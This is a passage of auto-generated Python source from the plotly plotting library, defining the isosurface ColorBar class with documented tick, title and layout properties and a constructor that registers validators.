royalblue, saddlebrown, salmon, sandybrown,
seagreen, seashell, sienna, silver, skyblue,
slateblue, slategray, slategrey, snow, springgreen,
steelblue, tan, teal, thistle, tomato, turquoise,
violet, wheat, white, whitesmoke, yellow,
yellowgreen
Returns
-------
str
"""
return self['tickcolor']
@tickcolor.setter
def tickcolor(self, val):
self['tickcolor'] = val
# tickfont
# --------
@property
def tickfont(self):
"""
Sets the color bar's tick label font
The 'tickfont' property is an instance of Tickfont
that may be specified as:
- An instance of plotly.graph_objs.isosurface.colorbar.Tickfont
- A dict of string/value properties that will be passed
to the Tickfont constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include "Arial",
"Balto", "Courier New", "Droid Sans",, "Droid
Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
plotly.graph_objs.isosurface.colorbar.Tickfont
"""
return self['tickfont']
@tickfont.setter
def tickfont(self, val):
self['tickfont'] = val
# tickformat
# ----------
@property
def tickformat(self):
"""
Sets the tick label formatting rule using d3 formatting mini-
languages which are very similar to those in Python. For
numbers, see: https://github.com/d3/d3-format/blob/master/READM
E.md#locale_format And for dates see:
https://github.com/d3/d3-time-
format/blob/master/README.md#locale_format We add one item to
d3's date formatter: "%{n}f" for fractional seconds with n
digits. For example, *2016-10-13 09:15:23.456* with tickformat
"%H~%M~%S.%2f" would display "09~15~23.46"
The 'tickformat' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self['tickformat']
@tickformat.setter
def tickformat(self, val):
self['tickformat'] = val
# tickformatstops
# ---------------
@property
def tickformatstops(self):
"""
The 'tickformatstops' property is a tuple of instances of
Tickformatstop that may be specified as:
- A list or tuple of instances of plotly.graph_objs.isosurface.colorbar.Tickformatstop
- A list or tuple of dicts of string/value properties that
will be passed to the Tickformatstop constructor
Supported dict properties:
dtickrange
range [*min*, *max*], where "min", "max" -
dtick values which describe some zoom level, it
is possible to omit "min" or "max" value by
passing "null"
enabled
Determines whether or not this stop is used. If
`false`, this stop is ignored even within its
`dtickrange`.
name
When used in a template, named items are
created in the output figure in addition to any
items the figure already has in this array. You
can modify these items in the output figure by
making your own item with `templateitemname`
matching this `name` alongside your
modifications (including `visible: false` or
`enabled: false` to hide it). Has no effect
outside of a template.
templateitemname
Used to refer to a named item in this array in
the template. Named items from the template
will be created even without a matching item in
the input figure, but you can modify one by
making an item with `templateitemname` matching
its `name`, alongside your modifications
(including `visible: false` or `enabled: false`
to hide it). If there is no template or no
matching item, this item will be hidden unless
you explicitly show it with `visible: true`.
value
string - dtickformat for described zoom level,
the same as "tickformat"
Returns
-------
tuple[plotly.graph_objs.isosurface.colorbar.Tickformatstop]
"""
return self['tickformatstops']
@tickformatstops.setter
def tickformatstops(self, val):
self['tickformatstops'] = val
# tickformatstopdefaults
# ----------------------
@property
def tickformatstopdefaults(self):
"""
When used in a template (as layout.template.data.isosurface.col
orbar.tickformatstopdefaults), sets the default property values
to use for elements of isosurface.colorbar.tickformatstops
The 'tickformatstopdefaults' property is an instance of Tickformatstop
that may be specified as:
- An instance of plotly.graph_objs.isosurface.colorbar.Tickformatstop
- A dict of string/value properties that will be passed
to the Tickformatstop constructor
Supported dict properties:
Returns
-------
plotly.graph_objs.isosurface.colorbar.Tickformatstop
"""
return self['tickformatstopdefaults']
@tickformatstopdefaults.setter
def tickformatstopdefaults(self, val):
self['tickformatstopdefaults'] = val
# ticklen
# -------
@property
def ticklen(self):
"""
Sets the tick length (in px).
The 'ticklen' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self['ticklen']
@ticklen.setter
def ticklen(self, val):
self['ticklen'] = val
# tickmode
# --------
@property
def tickmode(self):
"""
Sets the tick mode for this axis. If "auto", the number of
ticks is set via `nticks`. If "linear", the placement of the
ticks is determined by a starting position `tick0` and a tick
step `dtick` ("linear" is the default value if `tick0` and
`dtick` are provided). If "array", the placement of the ticks
is set via `tickvals` and the tick text is `ticktext`. ("array"
is the default value if `tickvals` is provided).
The 'tickmode' property is an enumeration that may be specified as:
- One of the following enumeration values:
['auto', 'linear', 'array']
Returns
-------
Any
"""
return self['tickmode']
@tickmode.setter
def tickmode(self, val):
self['tickmode'] = val
# tickprefix
# ----------
@property
def tickprefix(self):
"""
Sets a tick label prefix.
The 'tickprefix' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self['tickprefix']
@tickprefix.setter
def tickprefix(self, val):
self['tickprefix'] = val
# ticks
# -----
@property
def ticks(self):
"""
Determines whether ticks are drawn or not. If "", this axis'
ticks are not drawn. If "outside" ("inside"), this axis' are
drawn outside (inside) the axis lines.
The 'ticks' property is an enumeration that may be specified as:
- One of the following enumeration values:
['outside', 'inside', '']
Returns
-------
Any
"""
return self['ticks']
@ticks.setter
def ticks(self, val):
self['ticks'] = val
# ticksuffix
# ----------
@property
def ticksuffix(self):
"""
Sets a tick label suffix.
The 'ticksuffix' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self['ticksuffix']
@ticksuffix.setter
def ticksuffix(self, val):
self['ticksuffix'] = val
# ticktext
# --------
@property
def ticktext(self):
"""
Sets the text displayed at the ticks position via `tickvals`.
Only has an effect if `tickmode` is set to "array". Used with
`tickvals`.
The 'ticktext' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self['ticktext']
@ticktext.setter
def ticktext(self, val):
self['ticktext'] = val
# ticktextsrc
# -----------
@property
def ticktextsrc(self):
"""
Sets the source reference on plot.ly for ticktext .
The 'ticktextsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self['ticktextsrc']
@ticktextsrc.setter
def ticktextsrc(self, val):
self['ticktextsrc'] = val
# tickvals
# --------
@property
def tickvals(self):
"""
Sets the values at which ticks on this axis appear. Only has an
effect if `tickmode` is set to "array". Used with `ticktext`.
The 'tickvals' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self['tickvals']
@tickvals.setter
def tickvals(self, val):
self['tickvals'] = val
# tickvalssrc
# -----------
@property
def tickvalssrc(self):
"""
Sets the source reference on plot.ly for tickvals .
The 'tickvalssrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self['tickvalssrc']
@tickvalssrc.setter
def tickvalssrc(self, val):
self['tickvalssrc'] = val
# tickwidth
# ---------
@property
def tickwidth(self):
"""
Sets the tick width (in px).
The 'tickwidth' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self['tickwidth']
@tickwidth.setter
def tickwidth(self, val):
self['tickwidth'] = val
# title
# -----
@property
def title(self):
"""
The 'title' property is an instance of Title
that may be specified as:
- An instance of plotly.graph_objs.isosurface.colorbar.Title
- A dict of string/value properties that will be passed
to the Title constructor
Supported dict properties:
font
Sets this color bar's title font. Note that the
title's font used to be set by the now
deprecated `titlefont` attribute.
side
Determines the location of color bar's title
with respect to the color bar. Note that the
title's location used to be set by the now
deprecated `titleside` attribute.
text
Sets the title of the color bar. Note that
before the existence of `title.text`, the
title's contents used to be defined as the
`title` attribute itself. This behavior has
been deprecated.
Returns
-------
plotly.graph_objs.isosurface.colorbar.Title
"""
return self['title']
@title.setter
def title(self, val):
self['title'] = val
# titlefont
# ---------
@property
def titlefont(self):
"""
Deprecated: Please use isosurface.colorbar.title.font instead.
Sets this color bar's title font. Note that the title's font
used to be set by the now deprecated `titlefont` attribute.
The 'font' property is an instance of Font
that may be specified as:
- An instance of plotly.graph_objs.isosurface.colorbar.title.Font
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include "Arial",
"Balto", "Courier New", "Droid Sans",, "Droid
Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
"""
return self['titlefont']
@titlefont.setter
def titlefont(self, val):
self['titlefont'] = val
# titleside
# ---------
@property
def titleside(self):
"""
Deprecated: Please use isosurface.colorbar.title.side instead.
Determines the location of color bar's title with respect to
the color bar. Note that the title's location used to be set by
the now deprecated `titleside` attribute.
The 'side' property is an enumeration that may be specified as:
- One of the following enumeration values:
['right', 'top', 'bottom']
Returns
-------
"""
return self['titleside']
@titleside.setter
def titleside(self, val):
self['titleside'] = val
# x
# -
@property
def x(self):
"""
Sets the x position of the color bar (in plot fraction).
The 'x' property is a number and may be specified as:
- An int or float in the interval [-2, 3]
Returns
-------
int|float
"""
return self['x']
@x.setter
def x(self, val):
self['x'] = val
# xanchor
# -------
@property
def xanchor(self):
"""
Sets this color bar's horizontal position anchor. This anchor
binds the `x` position to the "left", "center" or "right" of
the color bar.
The 'xanchor' property is an enumeration that may be specified as:
- One of the following enumeration values:
['left', 'center', 'right']
Returns
-------
Any
"""
return self['xanchor']
@xanchor.setter
def xanchor(self, val):
self['xanchor'] = val
# xpad
# ----
@property
def xpad(self):
"""
Sets the amount of padding (in px) along the x direction.
The 'xpad' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self['xpad']
@xpad.setter
def xpad(self, val):
self['xpad'] = val
# y
# -
@property
def y(self):
"""
Sets the y position of the color bar (in plot fraction).
The 'y' property is a number and may be specified as:
- An int or float in the interval [-2, 3]
Returns
-------
int|float
"""
return self['y']
@y.setter
def y(self, val):
self['y'] = val
# yanchor
# -------
@property
def yanchor(self):
"""
Sets this color bar's vertical position anchor This anchor
binds the `y` position to the "top", "middle" or "bottom" of
the color bar.
The 'yanchor' property is an enumeration that may be specified as:
- One of the following enumeration values:
['top', 'middle', 'bottom']
Returns
-------
Any
"""
return self['yanchor']
@yanchor.setter
def yanchor(self, val):
self['yanchor'] = val
# ypad
# ----
@property
def ypad(self):
"""
Sets the amount of padding (in px) along the y direction.
The 'ypad' property is a number and may be specified as:
- An int or float in the interval [0, inf]
Returns
-------
int|float
"""
return self['ypad']
@ypad.setter
def ypad(self, val):
self['ypad'] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return 'isosurface'
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
bgcolor
Sets the color of padded area.
bordercolor
Sets the axis line color.
borderwidth
Sets the width (in px) or the border enclosing this
color bar.
dtick
Sets the step in-between ticks on this axis. Use with
`tick0`. Must be a positive number, or special strings
available to "log" and "date" axes. If the axis `type`
is "log", then ticks are set every 10^(n*dtick) where n
is the tick number. For example, to set a tick mark at
1, 10, 100, 1000, ... set dtick to 1. To set tick marks
at 1, 100, 10000, ... set dtick to 2. To set tick marks
at 1, 5, 25, 125, 625, 3125, ... set dtick to
log_10(5), or 0.69897000433. "log" has several special
values; "L<f>", where `f` is a positive number, gives
ticks linearly spaced in value (but not position). For
example `tick0` = 0.1, `dtick` = "L0.5" will put ticks
at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10 plus
small digits between, use "D1" (all digits) or "D2"
(only 2 and 5). `tick0` is ignored for "D1" and "D2".
If the axis `type` is "date", then you must convert the
time to milliseconds. For example, to set the interval
between ticks to one day, set `dtick` to 86400000.0.
"date" also has special values "M<n>" gives ticks
spaced by a number of months. `n` must be a positive
integer. To set ticks on the 15th of every third month,
set `tick0` to "2000-01-15" and `dtick` to "M3". To set
ticks every 4 years, set `dtick` to "M48"
exponentformat
Determines a formatting rule for the tick exponents.
For example, consider the number 1,000,000,000. If
"none", it appears as 1,000,000,000. If "e", 1e+9. If
"E", 1E+9. If "power", 1x10^9 (with 9 in a super
script). If "SI", 1G. If "B", 1B.
len
Sets the length of the color bar This measure excludes
the padding of both ends. That is, the color bar length
is this length minus the padding on both ends.
lenmode
Determines whether this color bar's length (i.e. the
measure in the color variation direction) is set in
units of plot "fraction" or in *pixels. Use `len` to
set the value.
nticks
Specifies the maximum number of ticks for the
particular axis. The actual number of ticks will be
chosen automatically to be less than or equal to
`nticks`. Has an effect only if `tickmode` is set to
"auto".
outlinecolor
Sets the axis line color.
outlinewidth
Sets the width (in px) of the axis line.
separatethousands
If "true", even 4-digit integers are separated
showexponent
If "all", all exponents are shown besides their
significands. If "first", only the exponent of the
first tick is shown. If "last", only the exponent of
the last tick is shown. If "none", no exponents appear.
showticklabels
Determines whether or not the tick labels are drawn.
showtickprefix
If "all", all tick labels are displayed with a prefix.
If "first", only the first tick is displayed with a
prefix. If "last", only the last tick is displayed with
a suffix. If "none", tick prefixes are hidden.
showticksuffix
Same as `showtickprefix` but for tick suffixes.
thickness
Sets the thickness of the color bar This measure
excludes the size of the padding, ticks and labels.
thicknessmode
Determines whether this color bar's thickness (i.e. the
measure in the constant color direction) is set in
units of plot "fraction" or in "pixels". Use
`thickness` to set the value.
tick0
Sets the placement of the first tick on this axis. Use
with `dtick`. If the axis `type` is "log", then you
must take the log of your starting tick (e.g. to set
the starting tick to 100, set the `tick0` to 2) except
when `dtick`=*L<f>* (see `dtick` for more info). If the
axis `type` is "date", it should be a date string, like
date data. If the axis `type` is "category", it should
be a number, using the scale where each category is
assigned a serial number from zero in the order it
appears.
tickangle
Sets the angle of the tick labels with respect to the
horizontal. For example, a `tickangle` of -90 draws the
tick labels vertically.
tickcolor
Sets the tick color.
tickfont
Sets the color bar's tick label font
tickformat
Sets the tick label formatting rule using d3 formatting
mini-languages which are very similar to those in
Python. For numbers, see: https://github.com/d3/d3-form
at/blob/master/README.md#locale_format And for dates
see: https://github.com/d3/d3-time-
format/blob/master/README.md#locale_format We add one
item to d3's date formatter: "%{n}f" for fractional
seconds with n digits. For example, *2016-10-13
09:15:23.456* with tickformat "%H~%M~%S.%2f" would
display "09~15~23.46"
tickformatstops
plotly.graph_objs.isosurface.colorbar.Tickformatstop
instance or dict with compatible properties
tickformatstopdefaults
When used in a template (as layout.template.data.isosur
face.colorbar.tickformatstopdefaults), sets the default
property values to use for elements of
isosurface.colorbar.tickformatstops
ticklen
Sets the tick length (in px).
tickmode
Sets the tick mode for this axis. If "auto", the number
of ticks is set via `nticks`. If "linear", the
placement of the ticks is determined by a starting
position `tick0` and a tick step `dtick` ("linear" is
the default value if `tick0` and `dtick` are provided).
If "array", the placement of the ticks is set via
`tickvals` and the tick text is `ticktext`. ("array" is
the default value if `tickvals` is provided).
tickprefix
Sets a tick label prefix.
ticks
Determines whether ticks are drawn or not. If "", this
axis' ticks are not drawn. If "outside" ("inside"),
this axis' are drawn outside (inside) the axis lines.
ticksuffix
Sets a tick label suffix.
ticktext
Sets the text displayed at the ticks position via
`tickvals`. Only has an effect if `tickmode` is set to
"array". Used with `tickvals`.
ticktextsrc
Sets the source reference on plot.ly for ticktext .
tickvals
Sets the values at which ticks on this axis appear.
Only has an effect if `tickmode` is set to "array".
Used with `ticktext`.
tickvalssrc
Sets the source reference on plot.ly for tickvals .
tickwidth
Sets the tick width (in px).
title
plotly.graph_objs.isosurface.colorbar.Title instance or
dict with compatible properties
titlefont
Deprecated: Please use isosurface.colorbar.title.font
instead. Sets this color bar's title font. Note that
the title's font used to be set by the now deprecated
`titlefont` attribute.
titleside
Deprecated: Please use isosurface.colorbar.title.side
instead. Determines the location of color bar's title
with respect to the color bar. Note that the title's
location used to be set by the now deprecated
`titleside` attribute.
x
Sets the x position of the color bar (in plot
fraction).
xanchor
Sets this color bar's horizontal position anchor. This
anchor binds the `x` position to the "left", "center"
or "right" of the color bar.
xpad
Sets the amount of padding (in px) along the x
direction.
y
Sets the y position of the color bar (in plot
fraction).
yanchor
Sets this color bar's vertical position anchor This
anchor binds the `y` position to the "top", "middle" or
"bottom" of the color bar.
ypad
Sets the amount of padding (in px) along the y
direction.
"""
_mapped_properties = {
'titlefont': ('title', 'font'),
'titleside': ('title', 'side')
}
def __init__(
self,
arg=None,
bgcolor=None,
bordercolor=None,
borderwidth=None,
dtick=None,
exponentformat=None,
len=None,
lenmode=None,
nticks=None,
outlinecolor=None,
outlinewidth=None,
separatethousands=None,
showexponent=None,
showticklabels=None,
showtickprefix=None,
showticksuffix=None,
thickness=None,
thicknessmode=None,
tick0=None,
tickangle=None,
tickcolor=None,
tickfont=None,
tickformat=None,
tickformatstops=None,
tickformatstopdefaults=None,
ticklen=None,
tickmode=None,
tickprefix=None,
ticks=None,
ticksuffix=None,
ticktext=None,
ticktextsrc=None,
tickvals=None,
tickvalssrc=None,
tickwidth=None,
title=None,
titlefont=None,
titleside=None,
x=None,
xanchor=None,
xpad=None,
y=None,
yanchor=None,
ypad=None,
**kwargs
):
"""
Construct a new ColorBar object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.isosurface.ColorBar
bgcolor
Sets the color of padded area.
bordercolor
Sets the axis line color.
borderwidth
Sets the width (in px) or the border enclosing this
color bar.
dtick
Sets the step in-between ticks on this axis. Use with
`tick0`. Must be a positive number, or special strings
available to "log" and "date" axes. If the axis `type`
is "log", then ticks are set every 10^(n*dtick) where n
is the tick number. For example, to set a tick mark at
1, 10, 100, 1000, ... set dtick to 1. To set tick marks
at 1, 100, 10000, ... set dtick to 2. To set tick marks
at 1, 5, 25, 125, 625, 3125, ... set dtick to
log_10(5), or 0.69897000433. "log" has several special
values; "L<f>", where `f` is a positive number, gives
ticks linearly spaced in value (but not position). For
example `tick0` = 0.1, `dtick` = "L0.5" will put ticks
at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10 plus
small digits between, use "D1" (all digits) or "D2"
(only 2 and 5). `tick0` is ignored for "D1" and "D2".
If the axis `type` is "date", then you must convert the
time to milliseconds. For example, to set the interval
between ticks to one day, set `dtick` to 86400000.0.
"date" also has special values "M<n>" gives ticks
spaced by a number of months. `n` must be a positive
integer. To set ticks on the 15th of every third month,
set `tick0` to "2000-01-15" and `dtick` to "M3". To set
ticks every 4 years, set `dtick` to "M48"
exponentformat
Determines a formatting rule for the tick exponents.
For example, consider the number 1,000,000,000. If
"none", it appears as 1,000,000,000. If "e", 1e+9. If
"E", 1E+9. If "power", 1x10^9 (with 9 in a super
script). If "SI", 1G. If "B", 1B.
len
Sets the length of the color bar This measure excludes
the padding of both ends. That is, the color bar length
is this length minus the padding on both ends.
lenmode
Determines whether this color bar's length (i.e. the
measure in the color variation direction) is set in
units of plot "fraction" or in *pixels. Use `len` to
set the value.
nticks
Specifies the maximum number of ticks for the
particular axis. The actual number of ticks will be
chosen automatically to be less than or equal to
`nticks`. Has an effect only if `tickmode` is set to
"auto".
outlinecolor
Sets the axis line color.
outlinewidth
Sets the width (in px) of the axis line.
separatethousands
If "true", even 4-digit integers are separated
showexponent
If "all", all exponents are shown besides their
significands. If "first", only the exponent of the
first tick is shown. If "last", only the exponent of
the last tick is shown. If "none", no exponents appear.
showticklabels
Determines whether or not the tick labels are drawn.
showtickprefix
If "all", all tick labels are displayed with a prefix.
If "first", only the first tick is displayed with a
prefix. If "last", only the last tick is displayed with
a suffix. If "none", tick prefixes are hidden.
showticksuffix
Same as `showtickprefix` but for tick suffixes.
thickness
Sets the thickness of the color bar This measure
excludes the size of the padding, ticks and labels.
thicknessmode
Determines whether this color bar's thickness (i.e. the
measure in the constant color direction) is set in
units of plot "fraction" or in "pixels". Use
`thickness` to set the value.
tick0
Sets the placement of the first tick on this axis. Use
with `dtick`. If the axis `type` is "log", then you
must take the log of your starting tick (e.g. to set
the starting tick to 100, set the `tick0` to 2) except
when `dtick`=*L<f>* (see `dtick` for more info). If the
axis `type` is "date", it should be a date string, like
date data. If the axis `type` is "category", it should
be a number, using the scale where each category is
assigned a serial number from zero in the order it
appears.
tickangle
Sets the angle of the tick labels with respect to the
horizontal. For example, a `tickangle` of -90 draws the
tick labels vertically.
tickcolor
Sets the tick color.
tickfont
Sets the color bar's tick label font
tickformat
Sets the tick label formatting rule using d3 formatting
mini-languages which are very similar to those in
Python. For numbers, see: https://github.com/d3/d3-form
at/blob/master/README.md#locale_format And for dates
see: https://github.com/d3/d3-time-
format/blob/master/README.md#locale_format We add one
item to d3's date formatter: "%{n}f" for fractional
seconds with n digits. For example, *2016-10-13
09:15:23.456* with tickformat "%H~%M~%S.%2f" would
display "09~15~23.46"
tickformatstops
plotly.graph_objs.isosurface.colorbar.Tickformatstop
instance or dict with compatible properties
tickformatstopdefaults
When used in a template (as layout.template.data.isosur
face.colorbar.tickformatstopdefaults), sets the default
property values to use for elements of
isosurface.colorbar.tickformatstops
ticklen
Sets the tick length (in px).
tickmode
Sets the tick mode for this axis. If "auto", the number
of ticks is set via `nticks`. If "linear", the
placement of the ticks is determined by a starting
position `tick0` and a tick step `dtick` ("linear" is
the default value if `tick0` and `dtick` are provided).
If "array", the placement of the ticks is set via
`tickvals` and the tick text is `ticktext`. ("array" is
the default value if `tickvals` is provided).
tickprefix
Sets a tick label prefix.
ticks
Determines whether ticks are drawn or not. If "", this
axis' ticks are not drawn. If "outside" ("inside"),
this axis' are drawn outside (inside) the axis lines.
ticksuffix
Sets a tick label suffix.
ticktext
Sets the text displayed at the ticks position via
`tickvals`. Only has an effect if `tickmode` is set to
"array". Used with `tickvals`.
ticktextsrc
Sets the source reference on plot.ly for ticktext .
tickvals
Sets the values at which ticks on this axis appear.
Only has an effect if `tickmode` is set to "array".
Used with `ticktext`.
tickvalssrc
Sets the source reference on plot.ly for tickvals .
tickwidth
Sets the tick width (in px).
title
plotly.graph_objs.isosurface.colorbar.Title instance or
dict with compatible properties
titlefont
Deprecated: Please use isosurface.colorbar.title.font
instead. Sets this color bar's title font. Note that
the title's font used to be set by the now deprecated
`titlefont` attribute.
titleside
Deprecated: Please use isosurface.colorbar.title.side
instead. Determines the location of color bar's title
with respect to the color bar. Note that the title's
location used to be set by the now deprecated
`titleside` attribute.
x
Sets the x position of the color bar (in plot
fraction).
xanchor
Sets this color bar's horizontal position anchor. This
anchor binds the `x` position to the "left", "center"
or "right" of the color bar.
xpad
Sets the amount of padding (in px) along the x
direction.
y
Sets the y position of the color bar (in plot
fraction).
yanchor
Sets this color bar's vertical position anchor This
anchor binds the `y` position to the "top", "middle" or
"bottom" of the color bar.
ypad
Sets the amount of padding (in px) along the y
direction.
Returns
-------
ColorBar
"""
super(ColorBar, self).__init__('colorbar')
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.isosurface.ColorBar
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.ColorBar"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop('skip_invalid', False)
# Import validators
# -----------------
from plotly.validators.isosurface import (colorbar as v_colorbar)
# Initialize validators
# ---------------------
self._validators['bgcolor'] = v_colorbar.BgcolorValidator()
self._validators['bordercolor'] = v_colorbar.BordercolorValidator()
self._validators['borderwidth'] = v_colorbar.BorderwidthValidator()
self._validators['dtick'] = v_colorbar.DtickValidator()
self._validators['exponentformat'
] = v_colorbar.ExponentformatValidator()
self._validators['len'] = v_colorbar.LenValidator()
self._validators['lenmode'] = v_colorbar.LenmodeValidator()
self._validators['nticks'] = v_colorbar.NticksValidator()
self._validators['outlinecolor'] = v_colorbar.OutlinecolorValidator()
self._validators['outlinewidth'] = v_colorbar.OutlinewidthValidator()
self._validators['separatethousands'
] = v_colorbar.SeparatethousandsValidator()
self._validators['showexponent'] = v_colorbar.ShowexponentValidator()
self._validators['showticklabels'
] = v_colorbar.ShowticklabelsValidator()
self._validators['showtickprefix'
] = v_colorbar.ShowtickprefixValidator()
self._validators['showticksuffix'
] = v_colorbar.ShowticksuffixValidator()
self._validators['thickness'] = v_colorbar.ThicknessValidator()
self._validators['thicknessmode'] = v_colorbar.ThicknessmodeValidator()
self._validators['tick0'] = v_colorbar.Tick0Validator()
self._validators['tickangle'] = v_colorbar.TickangleValidator()
self._validators['tickcolor'] = v_colorbar.TickcolorValidator()
self._validators['tickfont'] = v_colorbar.TickfontValidator()
self._validators['tickformat'] = v_colorbar.TickformatValidator()
self._validators['tickformatstops'
] = v_colorbar.TickformatstopsValidator()
self._validators['tickformatstopdefaults'
] = v_colorbar.TickformatstopValidator()
self._validators['ticklen'] = v_colorbar.TicklenValidator()
self._validators['tickmode'] = v_colorbar.TickmodeValidator()
self._validators['tickprefix'] = v_colorbar.TickprefixValidator()
self._validators['ticks'] = v_colorbar.TicksValidator()
self._validators['ticksuffix'] = v_colorbar.TicksuffixValidator()
self._validators['ticktext'] = v_colorbar.TicktextValidator()
self._validators['ticktextsrc'] = v_colorbar.TicktextsrcValidator()
self._validators['tickvals'] = v_colorbar.TickvalsValidator()
self._validators['tickvalssrc'] = v_colorbar.TickvalssrcValidator()
self._validators['tickwidth'] = v_colorbar.TickwidthValidator()
self._validators['title'] = v_colorbar.TitleValidator()
self._validators['x'] = v_colorbar.XValidator()
self._validators['xanchor'] = v_colorbar.XanchorValidator()
self._validators['xpad'] = v_colorbar.XpadValidator()
self._validators['y'] = v_colorbar.YValidator()
self._validators['yanchor'] = v_colorbar.YanchorValidator()
self._validators['ypad'] = v_colorbar.YpadValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop('bgcolor', None)
self['bgcolor'] = bgcolor if bgcolor is not None else _v
_v = arg.pop('bordercolor', None)
self['bordercolor'] = bordercolor if bordercolor is not None else _v
_v = arg.pop('borderwidth', None)
self['borderwidth'] = borderwidth if borderwidth is not None else _v
_v = arg.pop('dtick', None)
self['dtick'] = dtick if dtick is not None else _v
_v = arg.pop('exponentformat', None)
self['exponentformat'
] = exponentformat if exponentformat is not None else _v
_v = arg.pop('len', None)
self['len'] = len if len is not None else _v
_v = arg.pop('lenmode', None)
self['lenmode'] = lenmode if lenmode is not None else _v
_v = arg.pop('nticks', None)
self['nticks'] = nticks if nticks is not None else _v
_v = arg.pop('outlinecolor', None)
self['outlinecolor'] = outlinecolor if outlinecolor is not None else _v
_v = arg.pop('outlinewidth', None)
self['outlinewidth'] = outlinewidth if outlinewidth is not None else _v
_v = arg.pop('separatethousands', None)
self['separatethousands'
] = separatethousands if separatethousands is not None else _v
_v = arg.pop('showexponent', None)
self['showexponent'] = showexponent if showexponent is not None else _v
_v = arg.pop('showticklabels', None)
self['showticklabels'
] = showticklabels if showticklabels is not None else _v
_v = arg.pop('showtickprefix', None)
self['showtickprefix'
] = showtickprefix if showtickprefix is not None else _v
_v = arg.pop('showticksuffix', None)
self['showticksuffix'
] = showticksuffix if showticksuffix is not None else _v
_v = arg.pop('thickness', None)
self['thickness'] = thickness if thickness is not None else _v
_v = arg.pop('thicknessmode', None)
self['thicknessmode'
] = thicknessmode if thicknessmode is not None else _v
_v = arg.pop('tick0', None)
self['tick0'] = tick0 if tick0 is not None else _v
_v = arg.pop('tickangle', None)
self['tickangle'] = tickangle if tickangle is not None else _v
_v = arg.pop('tickcolor', None)
self['tickcolor'] = tickcolor if tickcolor is not None else _v
_v = arg.pop('tickfont', None)
self['tickfont'] = tickfont if tickfont is not None else _v
_v = arg.pop('tickformat', None)
self['tickformat'] = tickformat if tickformat is not None else _v
_v = arg.pop('tickformatstops', None)
self['tickformatstops'
] = tickformatstops if tickformatstops is not None else _v
_v = arg.pop('tickformatstopdefaults', None)
self[
'tickformatstopdefaults'
] = tickformatstopdefaults if tickformatstopdefaults is not None else _v
_v = arg.pop('ticklen', None)
self['ticklen'] = ticklen if ticklen is not None else _v
_v = arg.pop('tickmode', None)
self['tickmode'] = tickmode if tickmode is not None else _v
_v = arg.pop('tickprefix', None)
self['tickprefix'] = tickprefix if tickprefix is not None else _v
_v = arg.pop('ticks', None)
self['ticks'] = ticks if ticks is not None else _v
_v = arg.pop('ticksuffix', None)
self['ticksuffix'] = ticksuffix if ticksuffix is not None else _v
_v = arg.pop('ticktext', None)
self['ticktext'] = ticktext if ticktext is not None else _v
_v = arg.pop('ticktextsrc', None)
self['ticktextsrc'] = ticktextsrc if ticktextsrc is not None else _v
_v = arg.pop('tickvals', None)
self['tickvals'] = tickvals if tickvals is not None else _v
_v = arg.pop('tickvalssrc', None)
self['tickvalssrc'] = tickvalssrc if tickvalssrc is not None else _v
_v = arg.pop('tickwidth', None)
self['tickwidth'] = tickwidth if tickwidth is not None else _v
_v = arg.pop('title', None)
self['title'] = title if title is not None else _v
_v = arg.pop('titlefont', None)
_v = titlefont if titlefont is not None else _v
if _v is not None:
self['titlefont'] = _v
_v = arg.pop('titleside', None)
_v = titleside if titleside is not None else _v
if _v is not None:
self['titleside'] = _v
_v = arg.pop('x', None)
self['x'] = x if x is not None else _v
_v = arg.pop('xanchor', None)
self['xanchor'] = xanchor if xanchor is not None else _v
_v = arg.pop('xpad', None)
self['xpad'] = xpad if xpad is not None else _v
_v = arg.pop('y', None)
self['y'] = y if y is not None else _v
_v = arg.pop('yanchor', None)
self['yanchor'] = yanchor if yanchor is not None else _v
_v = arg.pop('ypad', None)
self['ypad'] = ypad if ypad is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Caps(_BaseTraceHierarchyType):
# x
# -
@property
